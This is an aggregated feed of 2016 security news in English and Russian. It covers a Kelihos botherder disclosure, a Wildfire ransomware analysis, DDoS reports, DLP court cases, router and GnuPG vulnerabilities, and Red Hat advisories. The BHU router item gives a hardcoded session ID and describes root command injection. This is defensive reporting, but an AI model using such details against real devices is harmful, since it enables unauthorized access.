    When I went to Botconf in December 2013, I was spending much time in my secluded hotel room (I stayed separately than others) more than in conference, so I can focus to this important disclosure that our team was counting on me to reveal it well during the Short Talk chance that was generously and thankfully given for this matter. These are the materials that I looked over and over like hundred times, with thinking of which detail that is needed to be shared in conference, which one that has to be shared to law enforcement only, and what information that is needed to be shared to friend-researchers.

    After discussion with our team mate the night before, and several discussions with the important persons, fyi: at that time the Kelihos CNC in Nederlands were successfully taken down my our friend from McAfee, Mr. Christiaan Beek, and our Germany team lead by wirehack7 together with LKA was in literally on "raid" action for the CNC machines of Kelihos CNC from its data center.. It was the crazy busy and hard time for a jet-lagged-guy from Japan who got very tired from travel via Paris airport for 7hrs (stuck in AirPort for long long lines), and slept in front door of hotel all night since the door was locked when I arrived at 11pm.. I selected the slides that was shared in-->[link] that later I rehearsed with Mr. Dhia Mahjoub of OpenDNS, the pair presenter.

    Soon it will be three full years since the first time I decompiled our first Kelihos botnet Win32 binary, and 2.5 years since BotConf 2013. With all due respect to great good hard working people in many security incident response entities, internet administration and law enforcement teams, frankly speaking there's nothing has been changed much in these three years, the actor is still out there receiving his monthly affiliated "fee" and living happily with still practicing his unique modus operandi to spread the badness in the internet.

    Figure1: Couple of Kelihos CNC dedicated machines' traffic in live monitoring in January 2016 by MalwareMustDie

    We still see Kelihos is distributed along with ransomware, and we still see Cookie Bomb codes is used to spread malware & also ransomware too via compromised weak PHP panel sites. The only difference made is we have growing numbers of takedown for this threat, like 22 to 24 CNC service shutdown in Kelihos botnet, and about 8 dedicated machine supported those IPs were taken down, until now.

    1. Slides of Kelihos crime PoC w/links to the herder

    Among the data I stared in the hotel room, these are the overall today's shareable data collected from our operation against this botnet (excluded Dhia's OpenDNS data which was merged right before the event started), contains very important PoC or evidence as as malicious verdict to a known internet crime bandit from St. Petersburg, the "Severa". I recollect them all in this one slide with adding all re-compiled and renewed comments with more supporting facts.

    Our team was patiently waiting for the justification of the crime done by known & reported identification, we reported and being very supportive to the law and order, as per supposed to be done, but the badness from the same source are still there and still active, so, as one of our member had just said "I think that full disclosure after 2.5 years is pretty reasonable.." (poke @Kira), we think the security community need to know what happened recently in Kelihos, what our team had actually achieved about it, and when/how/why/where we know the real ID of the Kelihos botherder who is actually the center of multiple cyber threat in the internet.

    Here is the slide:

    (the disclosure started from page 53)


    2. Peter Severa's (botherder's) SCAN4YOU.NET account to manage Kelihos botnet

    Supporting to the evidence posted in the slides above. To delete all of possibility of doubt, this is the video of scan4you.net account used by the actor, under the same email address and under the same tracked payment account used by the herder of Kelihos, the same email address and finance account that is used to pay the bills of the Kelihos dedicated servers in several hosters used, online support management and affiliation malware payment system.

    In the following video you will see the:


    1. Checking scheme of domains pointed to fast flux used by Kelihos
    2. Payload files and hashes of Kelihos binaries
    3. How detection ratio of Kelihos binaries is monitored by the herder via API automation
    4. Payment made with the regularity.
    5. The herder is very limiting his access via web site/pages for his OpSec
    6. Some tour about what is scan4you.net systems used by crooks.

    Here is the video, with the voice explanation, enjoy this, Severa.


    *) This account is still active as per I write this post

    3. Severa's financial accounts w/list of overall Kelihos CNC operational servers

    This section is to be added, stay tune & watch Severa started to sweat badly..
    New year is coming soon...

    Epilogue

    Please use the posted data with the right way. All of the information mentioned were searchable in the internet or dumps.

    I thank fellow MMD team mates & friends, who are proven solid in keeping the team work in fighting any botnet on this planet. The credits are given to the hard work they and other supporters did, this case is a good example as team work management between good folks to fight a bad cyber crime scene.

    #MalwareMustDie! - Where good guys spanks bad guys..Hard core :)

    orig: 2016-08-23 20:27:56 / http://blog.malwaremustdie.org/2016/05/slide-kelihos-severa-all-out-version.html (click post title)



    Wildfire, the ransomware threat that takes Holland and Belgium hostage

    no-image

    While ransomware is a global threat, every now and then we see a variant that targets one specific region. For example, the Coinvault malware had many infections in the Netherlands, because the authors posted malicious software on Usenet and Dutch people are particular fond of downloading things over Usenet. Another example is the recent Shade campaign, which targets mostly Russia and CIS.

    Today we can add a new one to the list: Wildfire.

    Infection vector

    Wildfire spreads through well-crafted spam e-mails. A typical spam e-mail mentions that a transport company failed to deliver a package. In order to schedule a new delivery the receiver is asked to make a new appointment, for which a form has to be filled in, which has to be downloaded from the website of the transport company.

    Three things stand out here. First, the attackers registered a Dutch domain name, something we do not see very often. Second, the e-mail is written in flawless Dutch. And thirdly, they actually put the address of the targeted company in the e-mail. This is something we do not see very often and makes it for the average user difficult to see that this is not a benign e-mail.

    Wildfire, the ransomware threat that takes Holland hostage

    However, when we look at who registered the domain name, we immediately see that something is suspicious:

    Wildfire, the ransomware threat that takes Holland hostage

    The registration date (registered a few days before the spam campaign started), as well as the administrative contact person seem to be very suspicious.

    The Word document

    After the user downloaded and opened the Word document, the following screen is shown:

    Wildfire, the ransomware threat that takes Holland hostage

    Apparently the document has some macros, containing pieces of English text, which clearly show the intent of the attackers (actually it is the lyrics of the famous Pink Floyd song Money), but also has several variables in the Polish language.

    Wildfire, the ransomware threat that takes Holland hostage

    The ransomware itself

    The macros download and execute the actual Wildfire ransomware which consists in the case we analyzed of the following three files:

  • Usiyykssl.exe;
  • Ymkwhrrxoeo.png;
  • Iesvxamvenagxehdoj.xml
  • The exe file is an obfuscated .net executable that depends on the other two files. This is exactly similar to the Zyklon ransomware that also consists of three files. Another similarity is that, according to some sources (http://www.bleepingcomputer.com/forums/t/611342/zyklon-locker-gnl-help-topic-locked-and-unlock-files-instructionshtml/, http://www.bleepingcomputer.com/forums/t/618641/wildfire-locker-help-topic-how-to-unlock-files-readme-6de99ef7c7-wflx/), Wildfire, GNLocker and Zyklon mainly target the Netherlands. In addition, the ransom notes of Wildfire and Zyklon look quite similar. Also note that Wildfire and Zyklon increase the amount you have to pay three-fold if you don’t pay within the specified amount of time.

    Wildfire, the ransomware threat that takes Holland hostage

    Wildfire, the ransomware threat that takes Holland hostage

    Anyway, back to Wildfire. The binary is obfuscated, meaning that when there is no deobfuscator available reversing and analyzing it can take a lot of time. Therefore we decided to run it and see what happens. Just as we hoped, this made things a bit easier, because after a while Usiyykssl.exe launched Regasm.exe, and when we looked into the memory of Regasm.exe, we clearly saw that some malicious code had been injected into it.

    We at Kaspersky Lab love images with blue backgrounds

    Wildfire, the ransomware threat that takes Holland hostage

    Dumping it gave us the binary of the actual Wildfire malware. Unfortunately for us, this binary is also obfuscated, this time with Confuserex 0.6.0. Even though it is possible to deobfuscate binaries obfuscated with Confuserex, we decided to skip that for now. Why? Well it takes a bit of time, and because by working together with the police on this case, we had something much better in our hands: The botnetpanel code!

    Inside the botnetpanel code

    When you are infected with Wildfire, the malware calls home to the C2 server where information such as the IP, username, rid and country are stored. The botnetpanel then checks whether the country is one of the blacklisted countries (Russia, Ukraine, Belarus, Latvia, Estonia and Moldova). It also checks whether the “rid” exists within a statically defined array (we therefore expect the rid to be an affiliate ID).

    If the rid is not found, or you live in one of the blacklisted countries, the malware terminates and you won’t get infected.

    Each time the malware calls home, a new key is generated and added to the existing list of keys. The same victim can thus have multiple keys. Finally the botnetpanel returns the bitcoin address to which the victim should pay, and the cryptographic key with which the files on the victim’s computer are encrypted. We don’t quite understand why a victim can have multiple keys, especially since the victim only has one bitcoin address.

    Also interesting is the encryption scheme. It uses AES in CBC mode but the key and the IV are both derived from the same key. This doesn’t add much security and defeats the sole purpose of having an IV in the first place.

    Wildfire, the ransomware threat that takes Holland hostage

    Wildfire, the ransomware threat that takes Holland hostage

    Conclusion

    Even though Wildfire is a local threat, it still shows that ransomware is effective and evolving. In less than a month we observed more than 5700 infections and 236 users paid a total amount of almost 70.000 euro . This is also due to the fact that the spam e-mails are getting better and better.

    We therefore advise users to:

    A decryption tool for Wildfire can be downloaded from the nomoreransom.org website.

    P.S. the attackers agree with us on some points:

    Wildfire, the ransomware threat that takes Holland hostage

    orig: 2016-08-23 18:00:32 / https://securelist.com/blog/research/75842/wildfire-the-ransomware-threat-that-takes-holland-hostage/ (click post title)



    Атака Know Your Enemy позволяет получить важные данные об инфраструктуре целевой SDN-сети

    Атакующий потенциально может подключиться к портам маршрутизатора, перехватить трафик или проэксплуатировать уязвимости в ОС коммутатора.

    Группа итальянских исследователей разработала новый метод атаки, позволяющий получить важные данные о конфигурации программно-определяемых сетей (Software-defined networking, SDN), включая информацию о поведении сети, а также настройках сетевой виртуализации, политиках и конфигурации инструментов защиты.

    Основным элементом концепции SDN является протокол Openflow, обеспечивающий взаимодействие контроллера с сетевыми устройствами. Контроллер используется для управления таблицами потоков коммутаторов, на основании которых принимается решение о передаче принятого пакета на конкретный порт коммутатора.

    Даже единственная таблица потока может предоставить важную информацию или использоваться для атаки по стронним каналам, утверждают исследователи. К примеру, атакующий потенциально может подключиться к портам маршрутизатора, используемым для удаленной отладки и извлечь таблицу потока, перехватить трафик, проэксплуатировать уязвимости в ОС коммуникатора или сделать копию таблицы или контента памяти.

    По словам исследователей, проблема не затрагивает какие-либо определенные устройства. Атака, окрещенная Know Your Enemy, эксплуатирует структурную уязвимость программно-конфигурируемой сети, которая возникает из-за специфики управления сетевым потоком. Поскольку SDN разработана таким образом, чтобы взаимодействовать с сетью путем отправки правил потоков на коммутаторы, атакующему необходимо определить, при каких условиях контроллер отправит правило на устройство и выяснить, какие политики активируют определенное правило.

    Как отмечают эксперты, архитекторам SDN-сетей необходимо реализовать технологию обфускации потоков для предотвращения эксплуатации ответов SDN с целью получения доступа к важной информации.

    «Если преступник не сможет определить, какой сетевой поток приводит к установке какого-либо конкретного правила, атака Know Your Enemy будет бесполезна», - подчеркнули исследователи.

     

    orig: 2016-08-23 17:21:20 / http://www.securitylab.ru/news/483480.php (click post title)



    Эксперты зафиксировали рост DDoS-атак на уровне приложений

    DDoS-атаки на уровне приложений требуют небольших денежных затрат и эффективно обходят механизмы безопасности.

    Согласно отчету компании Imperva, в 2015-2016 годах DDoS-атаки на уровне приложений стали более распространенными, чем раньше. По словам экспертов, это связано с тем, что по сравнению с атаками на уровне сети, они требуют меньше денежных затрат и гораздо эффективнее обходят механизмы безопасности.

    Исследование экспертов базируется на реальных данных об атаках на пользователей облачного сервиса Incapsula, собранных с 1 апреля 2015 года по 31 марта 2016 года. 60% DDoS-атак, осуществленных за указанный период времени, были на уровне приложений, а 40% - на уровне сети. Среднее количество DDoS-атак обоих типов составило 445 в неделю (с течением года количество увеличивалось).

    Как сообщается в отчете, популярности DDoS-атак способствует рост количества сервисов, предлагающих инструменты, которые легитимные компании могут использовать для тестирования своих механизмов безопасности. За указанный выше период число DDoS-атак, осуществленных по бизнес-модели «DDoS на заказ» (DDoS-for-hire), выросло с 63,8% до 93%.

    Как пояснили в Imperva, такой скачок можно частично отнести на счет появления новых клиентов, подписавшихся на сервис Incapsula. Однако многие из них решили воспользоваться услугами платформы как раз потому, что столкнулись с DDoS-атаками.

    Еще одним интересным трендом у киберпреступников является использование ряда маломощных DDoS-атак, осуществляемых одна за другой. Подобные атаки не причиняют существенного вреда компаниям, однако они исчерпывают ресурсы ИБ-отделов, тем самым снижая их эффективность. Нередко такие атаки используются для отвлечения внимания от более серьезных угроз.

    По данным Imperva, в 2015-2016 годах увеличилась мощность DDoS-атак. Максимальная мощность атаки, зафиксированная компанией во втором квартале текущего года, достигла 470 Гб/с. Такие атаки осуществляются с помощью ботнетов, пояснили эксперты. Конкретно данный инцидент представлял собой атаку на уровне сети.

    87,8% зафиксированных Imperva DDoS-атак длились меньше 30 минут. Самая длинная атака продолжалась 54 дня. Большинство атак имели один вектор, и только совсем незначительная часть осуществлялась сразу по нескольким (до пяти). Наибольшей популярностью пользовались атаки UDP-флуд, далее следуют SYN-флуд, TCP-флуд и Large SYN-флуд. Главным источником DDoS-атак исследователи назвали Китай, а главной жертвой – США. 

    orig: 2016-08-23 17:20:00 / http://www.securitylab.ru/news/483479.php (click post title)



    Imperva: DDoS-атаки на приложения усилились

    Компания Imperva в очередном отчете отметила, что за последние месяцы участились DDoS-атаки на уровень приложений: они более просты и дешевы в исполнении, а также легче обходят защиту, реализованную на уровне сети. Свежий отчет компании основан на данных облачного сервиса Incapsula, собранных с 1 апреля 2015 года по 31 марта 2016 года.

    Одна из таких атак достигла мощности 8,7 Гбит/с — это прежде недостижимый показатель для атак на уровень приложений. Атаки на приложения требуют меньше ресурсов, чем атаки на сеть. Учитывая используемую «дидосерами по найму» бизнес-модель, один и тот же бюджет может обеспечить более продолжительную атаку на приложение, если сравнивать ее по продолжительности с типичной атакой на сетевые ресурсы. Например, более 44% атак на приложения длились больше часа; для DDoS-атак на сеть доля таковых составила 12,2%.

    За отчетный период 60% DDoS-атак было направлено на уровень приложений, а 40% — на уровень сети; эксперты ожидают, что текущий тренд позволит достичь соотношения 50/50 к 2018 году. DDoS-атаки на сеть позволяют воссоздавать более высокие пики мусорного трафика, так как пакеты, которыми обмениваются сети, намного «легче».

    По данным отчета, в среднем атаки на оба уровня происходили с частотой 445 инцидентов в неделю; этот показатель увеличился за прошедший год. Это явление обусловлено рядом факторов. «Входной ценз» для начинающего дидосера постоянно снижается за счет появления недорогих услуг по проведению DDoS-атак под видом проверки защиты сети легитимными инструментами. За год количество атак, использующих «дидосеров по найму», увеличилось с 63,8 до 93%. Большинство исполнителей применяют DDoS для шантажа, рэкета или просто ради развлечения.

    Imperva оговаривается, что резкий скачок этого показателя, возможно, объясняется увеличением клиентской базы компании и, следовательно, выборки. Многие новые клиенты рассказывают об участившихся случаях DDoS-вымогательства.

    Еще один заметный тренд года — это постепенное повышение мощности атаки. Таким образом злоумышленники изматывают ИБ-команду и снижают эффективность реагирования либо же используют DDoS-атаки для отвлечения внимания от другой, более серьезной проблемы.

    Средняя пиковая мощность атак также выросла: самая мощная атака достигла пиковой мощности в 470 Гбит/с. Как пояснили эксперты, пиковая мощность зависит от величины ботнетов.

    Большинство атак (87,8%) не превышали 30 минут, а самая продолжительная длилась целых 54 дня. В основном атаки использовали один вектор, но совсем немногие использовали до пяти векторов. Самыми популярными атаками были атаки из UDP-пакетов, за ними по степени популярности следуют SYN-пакеты, TCP-флуды и массированные SYN-флуды.

    Основными мишенями атак стали США, а наиболее активные дидосеры находятся в Китае.

    orig: 2016-08-23 16:54:03 / https://threatpost.ru/imperva-ddos-ataki-na-prilozheniya-usililis/17745/ (click post title)



    Судебная практика: Использование DLP для доказательства разглашения информации

    Для любителей DLP выкладываю несколько полезных ссылок на судебные дела, в материалах которых фигурирует упоминание DLP-систем в качестве источника доказательства разглашения информации. 
    Хахаха, скептикам, которые все еще пытаются утверждать, что DLP-системы нарушают конституционные права граждан. Чушь все это (если вы конечно все правильно делаете, как правильно - смотреть тут)! Суды вполне себе принимают отчеты DLP, и предоставлять их полезно. Но стоит помнить, что их наличие не является необходимым и тем более достаточным условием признания вины...
    Итак, судебная практика:
    1.Решение по делу 1-160/2013, ЗАО «ФосАгро АГ» против Топчян А.А.
    Суть дела: Сотрудника уволили по ст. за разглашение сведений, составляющих КТ, а потом еще судили по ст. 183 УК РФ (Незаконные получение и разглашение сведений, составляющих коммерческую, налоговую или банковскую тайну, ч1 и ч2).
    Упомянутое DLP: "Дозор-Джет" и "Контур безопасности"
    Победитель: Компания
    Решение Суда: Суд признал Топчана А.А. виновным по ч.1 и ч.2 ст. 183 УК РФ и назначил наказание в виде 1 года 9 месяцев исправительных работ с удержанием из заработка ежемесячно 15% в доход государства.
    Ссылка на текст решения - https://rospravosudie.com/court-gagarinskij-rajonnyj-sud-gorod-moskva-s/act-424307536/
    Чем интересно:


    2.Решение по делу №33-90/11, Садыков Т.Ф. против ЗАО ???
    Суть дела: Сотрудника уволили по статье (разглашение), он обиделся и обратился в суд с иском о восстановлении на работе, взыскании заработной платы за время вынужденного прогула, компенсации морального вреда.
    Упомянутое DLP: «Дозор-Джет»
    Победитель: Сотрудник
    Решение Суда: Решение суда оставить без изменения (увольнение признано незаконным, сотрудник восстановлен в должности, ему заплатили средний заработок и компенсацию морального вреда).
    Ссылка на решение - https://rospravosudie.com/court-verxovnyj-sud-udmurtskoj-respubliki-udmurtskaya-respublika-s/act-515446360/ 
    Чем интересно:
    3.Решение по делу №2-11976/2014 ~ М-10846/2014, ???ФИО1. против Фонда социального страхования
    Суть дела: Сотрудника уволили по статье (разглашение), она обиделась и обратилась в суд с иском о признании приказа об увольнении незаконным, восстановлении на работе, признании записи в трудовой книжки недействительной, оплате время вынужденного прогула, взыскании компенсации морального вреда.
    Упомянутое DLP: InfoWatch
    Победитель: Компания
    Решение суда: Отказано в удовлетворении иска

    Ссылка на решение - https://rospravosudie.com/court-meshhanskij-rajonnyj-sud-gorod-moskva-s/act-470685128/
    Чем интересно:
    4.Решение по делу №2-283/2015 (2-6150/2014) ~ М-6623/2014, Пономаренко О.А. против ООО Национальная служба взыскания
    Суть дела: Сотрудника уволили по статье (разглашение), она обиделась и обратилась в суд с иском о признании приказа об увольнении незаконным, восстановлении на работе, признании записи в трудовой книжки недействительной, оплате время вынужденного прогула, взыскании компенсации морального вреда.
    Упомянутое DLP: InfoWatch
    Победитель: Компания
    Решение суда: Отказано в удовлетворении иска
    Ссылка на дело (без текста решения) - https://gagarinsky--msk.sudrf.ru/modules.php?name=sud_delo&srv_num=1&name_op=case&case_id=291516987&result=1&delo_id=1540005&new=
    Чем интересно:

    orig: 2016-08-23 16:45:48 / http://80na20.blogspot.com/2016/08/dlp.html (click post title)



    Turkish Journalist Jailed for Terrorism Was Framed, Forensic Report Shows

    Members: 30762
    Online Now: 81
    ±Forensic Focus Partners ±Your Account ±Latest Articles ±Latest Jobs
    Digital Forensic Investigator - Hampshire Constabulary
    Last post by DCS1094 in Digital Forensics Job Vacancies on Aug 22, 2016 at 12:51:47

    Computer Evidence Specialist I, II, or III - Syracuse, NY
    Last post by fbrackin in Digital Forensics Job Vacancies on Aug 18, 2016 at 18:07:32

    Cel*****ar Analyst: United States, Various Locations.
    Last post by LarryDaniel in Digital Forensics Job Vacancies on Aug 18, 2016 at 11:37:01

    Digital Evidence Technician, TVP, Kidlington, Oxfordshire
    Last post by Mark-Larson in Digital Forensics Job Vacancies on Aug 18, 2016 at 08:46:07

    Cyber Crime Investigator
    Last post by Fboyle in Digital Forensics Job Vacancies on Aug 17, 2016 at 14:10:13

    COMPUTER FORENSIC ANALYST - Long Island, New York
    Last post by pvteye in Digital Forensics Job Vacancies on Aug 17, 2016 at 13:20:50

    Security Engineer, Forensics @ Google in Zurich (CH) and US
    Last post by joachimm in Digital Forensics Job Vacancies on Aug 15, 2016 at 18:19:49

    Digital Forensic Senior Consultant - London
    Last post by seansmyth10 in Digital Forensics Job Vacancies on Aug 15, 2016 at 16:26:56

    Thames Valley Police - HTCU Vacancies - Kidlington, Oxon
    Last post by Mark-Larson in Digital Forensics Job Vacancies on Aug 12, 2016 at 11:17:05

    eDiscovery Consultant in the area of Ingelheim (Germany)
    Last post by vishu in Digital Forensics Job Vacancies on Aug 11, 2016 at 06:24:47

    ±Follow Forensic Focus Turkish Journalist Jailed for Terrorism Was Framed, Forensic Report Shows 0 comments

    Log in to post a comment. The comments are owned by the poster. Forensic Focus is not responsible for their content.



    orig: 2016-08-23 16:21:20 / http://www.forensicfocus.com/News/article/sid=2718/ (click post title)



    Массированная атака Locky направлена на больницы

    В этом месяце исследователи заметили масштабную кампанию Locky, целью которой стали учреждения здравоохранения. Зловред доставляется при помощи фишинговой рассылки. Вредоносный компонент заключен во вложениях .DOCM с вредоносными макросами, говорится в отчете компании FireEye.

    Наибольший урон нанесен больницам в США; также пострадали учреждения в Японии, Корее и Таиланде.

    Исследователь Ронгва Чон (Ronghwa Chong) отметил, что в ходе нынешней атаки Locky использует новую тактику: в марте киберпреступники использовали для распространения спам с вредоносным JavaScript.

    «Резкий скачок количества детектов и изменения в тактике говорят о том, что киберпреступники вкладывают больше усилий в распространение зловреда и увеличение прибыли, — пишет Чон. — Кроме того, мы обнаружили, что распространение Dridex через этот канал практически прекратилось, что объясняет резкую активизацию распространения Locky».

    В июне исследователи Proofpoint отметили более активное распространение банковского троянца Dridex, а также вымогателя Locky через ботнет Necurs.

    Тщательно проанализировав поддельные сообщения, содержащие загрузчик Locky, след вымогателя в Сети, а также вредоносное DOCM-вложение, исследователи смогли найти связь между массивными волнами спама в этом месяце. Эта связь может быть признаком того, что атаки могут быть скоординированы группой хакеров или осуществлены одним и тем же злоумышленником.

    «Каждая email-кампания имеет уникальный одноразовый код для загрузки вредоносного компонента Locky c сервера атаки», — отметил Чон. Также исследователи заметили вредоносную URL-ссылку, внедренную в макрокод при помощи одной и той же функции кодирования, которая применяется в соответствии с уникальным ключом в каждой кампании.

    Кроме учреждений здравоохранения в результате атак пострадали компании из телекоммуникационного, транспортного и производственного секторов.

    Вымогатель Locky известен масштабной атакой на Пресвитерианский госпиталь в Голливуде в феврале, в результате чего учреждение вынуждено было заплатить $17 тыс. за дешифратор. Как считают эксперты по безопасности, больницы стали основной мишенью вымогателей из-за сочетания низких стандартов обеспечения безопасности и высокой ценности данных.

    В течение последних месяцев Locky превратился в вымогателя номер один, говорится в отчете Proofpoint. Во втором квартале из всех email-атак с вредоносными вложениями 69% содержали Locky. «Это на 45% больше, чем в первом квартале, если говорить только о Locky», — сообщают в Proofpoint.

    «Количество загрузчиков Locky увеличивается, а техники и инструментарий, используемые в кампаниях, постоянно изменяются. В данном случае мы наблюдаем, что злоумышленники отказываются от JavaScript-загрузчика в пользу DOCM с вредоносными макросами. Кроме того, тенденции в мире киберпреступности показывают, что хакеры распространяют больше вымогателей, чем банкеров, так как первые приносят больше прибыли», — пишет Чон.

    orig: 2016-08-23 16:02:29 / https://threatpost.ru/locky-targets-hospitals-in-massive-wave-of-ransomware-attacks/17743/ (click post title)



    WordPress Mail Master 1.0 Local File Inclusion

    WordPress Mail Masta plugin version 1.0 suffers from a local file inclusion vulnerability.

    orig: 2016-08-23 15:55:55 / https://packetstormsecurity.com/files/138481/wpmailmaster-lfi.txt (click post title)



    VideoIQ Camera Remote File Disclosure

    VideoIQ Camera suffers from a file disclosure vulnerability.

    orig: 2016-08-23 15:44:44 / https://packetstormsecurity.com/files/138485/videoiq-disclose.txt (click post title)



    Критическая уязвимость исправлена в GnuPG и Libgcrypt

    Проект GnuPG объявили на прошлой неделе о наличии обновлений для GnuPG и Libgcrypt, которые устраняют критическую уязвимость, затрагивающую все версии, выпущенные в течение последних 18 лет.

    GNU Privacy Guard, также известный как GnuPG и GPG - свободная реализация стандарта OpenPGP. GPG используется популярными инструментами для шифрования email. Libgcrypt – крипто-библиотека общего назначения на основе GPG.

    Исследователи Феликс Дерре и Владимир Клебанов из технологического института в Германии обнаружили проблему в функции генератора псевдослучайных чисел (PRNG).

    «Из-за этого недостатка часть результата функции PRNG становится полностью предсказуема» - пишут эксперты в статье.

    По словам Вернера Коха (Werner Koch), разработчика GnuPG, злоумышленник, который сможет получить 4640 бит, будет способен предсказать следующие 160 бит выходных данных.

    Уязвимость, отслеживающаяся как CVE-2016-6313, затрагивает все версии GnuPG и Libgcrypt, выпущенные с 1998 года. Проблема была решена с выпуском Libgcrypt 1.7.3, 1.6.6 и 1.5.6;  GnuPG-2 2.0.x, 2.1.x, и GnuPG 1.4.21.

    Программные проекты, которые используют GnuPG и Libgcrypt, как ожидается, выпустят свои обновления.

    orig: 2016-08-23 15:26:51 / https://www.anti-malware.ru/news/2016-08-23/20761 (click post title)



    В маршрутизаторах BHU обнаружено множество уязвимостей

    Исследователи наткнулись на маршрутизатор, столь уязвимый и содержащий такое число уязвимостей, что его можно использовать практически для любых вредоносных целей. Атакующий может обойти процесс аутентификации, воспользоваться конфиденциальной информацией, хранимой в системных логах устройства, и даже исполнять команды с привилегиями уровня root, поскольку в маршрутизаторе присутствует вшитый пароль для учетной записи с привилегиями уровня root.

    Тао Соваж (Tao Sauvage), ИБ-консультант из IOActive Labs, приобрел данный Wi-Fi-маршрутизатор производства BHU, который он назвал uRouter, во время недавней поездки в Китай. Веб-интерфейс устройства представлен на китайском языке, но специалист смог извлечь прошивку, заполучить доступ к оболочке и проанализировать код. Изучив несколько двоичных файлов, он обнаружил, что существует три различных способа, позволяющих заполучить административный доступ к веб-интерфейсу устройства.

    Как говорится в блог-записи, опубликованной IOActive, по непонятным причинам маршрутизатор принимает все куки с идентификаторами сессии, а это значит, что кто угодно может выдать себя за аутентифицированного пользователя. Атакующий также может воспользоваться вшитым идентификатором сессии — 700000000000000 либо просмотреть системные логи и использовать присутствующие там значения идентификаторов сессий, для того чтобы заполучить доступ к функциям маршрутизатора, требующим аутентификации.

    По словам эксперта, заполучив административный доступ, повысить привилегии до уровня root было нетрудно. Для использования некоторых функций и вовсе не требуется аутентификация. К таковым относится функция, обрабатывающая XML в теле запроса и ищущая соответствующую функцию обратного вызова.

    Соваж отмечает, что маршрутизатор не проводит должного санирования значений XML, позволяя атакующему без особого труда внедрять команды, которые будут исполнены с привилегиями уровня root.

    Эксперт заявляет, что при помощи анализатора пакетов вроде tcpdump маршрутизатор можно использовать для перехвата трафика. Помимо этого атакующий может перенаправить трафик, изменив настройки устройства, внедрить в него бэкдор или нарушить его работу, удалив критические файлы.

    Устройство не располагает даже простыми защитными механизмами, в силу чего к нему можно заполучить доступ из ГВС. «Дефолтные настройки файервола не предотвращают доступ из ГВС», — пишет специалист.

    Даже когда он посчитал, что обнаружил все имеющиеся уязвимости, оказалось, что при загрузке устройство включает использование SSH по умолчанию и перезаписывает вшитый пароль к учетной записи с правами уровня root.

    «На практике это означает, что кто угодно, кому известен пароль к root-учетке, сможет подсоединиться к маршрутизатору по SSH и заполучить привилегии уровня root. Администратор не в силах изменить или удалить вшитый пароль, — пишет эксперт. — Этому устройству лучше в принципе не давать доступ к сети Интернет!»

    Помимо этого маршрутизатор внедряет подозрительный сторонний JS-файл в HTTP-трафик. Хотя данный файл якобы должен «обеспечить дополнительный уровень конфиденциальности за счет продвинутой фильтрации», Соваж отмечает, что помимо странного модуля ядра, подгружаемого при загрузке устройства, файл может быть использован в качестве вектора атаки.

    Неясно, известно ли компании-производителю BHU Networks Technology Co., Ltd, расположенной на территории Пекина, Китай, о том, насколько уязвим их продукт. Почтовый сервер компании немедленно отклонил письмо от Threatpost с запросом прокомментировать ситуацию.

    К безопасности маршрутизаторов зачастую не подходят с должной ответственностью — пользователи не спешат обновлять прошивки, а вендоры далеко не всегда могут обезопасить устройства.

    В начале этого лета Netgear выпустила обновления прошивки, чтобы устранить проблему, связанную с вшитыми криптоключами, позволявшими атакующим заполучить доступ с правами администратора, которым они могли воспользоваться для проведения MitM-атаки или для расшифровки перехваченных пакетов.

    Схожий с нынешним набор уязвимостей был обнаружен в начале этого года в продукции тайваньской компании Quanta. Компания не стала заниматься разработкой патчей, поскольку уязвимое устройство ею более не поддерживалось.

    orig: 2016-08-23 15:05:53 / https://threatpost.ru/multiple-vulnerabilities-identified-in-utterly-broken-bhu-routers/17740/ (click post title)



    Lynis Auditing Tool 2.3.3

    Lynis is an auditing tool for Unix (specialists). It scans the system and available software to detect security issues. Beside security related information it will also scan for general system information, installed packages and configuration mistakes. This software aims in assisting automated auditing, software patch management, vulnerability and malware scanning of Unix based systems.

    orig: 2016-08-23 14:23:11 / https://packetstormsecurity.com/files/138479/lynis-2.3.3.tar.gz (click post title)



    Red Hat Security Advisory 2016-1655-01

    Red Hat Security Advisory 2016-1655-01 - KVM is a full virtualization solution for Linux on AMD64 and Intel 64 systems. The qemu-kvm-rhev package provides the user-space component for running virtual machines using KVM in environments managed by Red Hat Enterprise Virtualization Manager. Security Fix: Quick Emulator built with the Block driver for iSCSI images support is vulnerable to a heap buffer overflow issue. It could occur while processing iSCSI asynchronous I/O ioctl calls. A user inside guest could use this flaw to crash the Qemu process resulting in DoS or potentially leverage it to execute arbitrary code with privileges of the Qemu process on the host.

    orig: 2016-08-23 14:18:13 / https://packetstormsecurity.com/files/138478/RHSA-2016-1655-01.txt (click post title)



    Red Hat Security Advisory 2016-1654-01

    Red Hat Security Advisory 2016-1654-01 - KVM is a full virtualization solution for Linux on AMD64 and Intel 64 systems. The qemu-kvm-rhev package provides the user-space component for running virtual machines using KVM in environments managed by Red Hat Enterprise Virtualization Manager. Security Fix: Quick Emulator built with the Block driver for iSCSI images support is vulnerable to a heap buffer overflow issue. It could occur while processing iSCSI asynchronous I/O ioctl calls. A user inside guest could use this flaw to crash the Qemu process resulting in DoS or potentially leverage it to execute arbitrary code with privileges of the Qemu process on the host.

    orig: 2016-08-23 14:18:09 / https://packetstormsecurity.com/files/138477/RHSA-2016-1654-01.txt (click post title)



    Red Hat Security Advisory 2016-1652-01

    Red Hat Security Advisory 2016-1652-01 - KVM is a full virtualization solution for Linux on AMD64 and Intel 64 systems. The qemu-kvm-rhev package provides the user-space component for running virtual machines using KVM in environments managed by Red Hat Enterprise Virtualization Manager. Security Fix: Quick emulator built with the virtio framework is vulnerable to an unbounded memory allocation issue. It was found that a malicious guest user could submit more requests than the virtqueue size permits. Processing a request allocates a VirtQueueElement and therefore causes unbounded memory allocation on the host controlled by the guest.

    orig: 2016-08-23 14:18:03 / https://packetstormsecurity.com/files/138476/RHSA-2016-1652-01.txt (click post title)



    Red Hat Security Advisory 2016-1653-01

    Red Hat Security Advisory 2016-1653-01 - KVM is a full virtualization solution for Linux on AMD64 and Intel 64 systems. The qemu-kvm-rhev package provides the user-space component for running virtual machines using KVM in environments managed by Red Hat Enterprise Virtualization Manager. Security Fix: Quick Emulator built with the Block driver for iSCSI images support is vulnerable to a heap buffer overflow issue. It could occur while processing iSCSI asynchronous I/O ioctl calls. A user inside guest could use this flaw to crash the Qemu process resulting in DoS or potentially leverage it to execute arbitrary code with privileges of the Qemu process on the host.

    orig: 2016-08-23 14:17:57 / https://packetstormsecurity.com/files/138475/RHSA-2016-1653-01.txt (click post title)



    Microsoft Security Bulletin Revision Increment For August, 2016

    This bulletin summary lists one bulletin that has undergone a major revision increment.

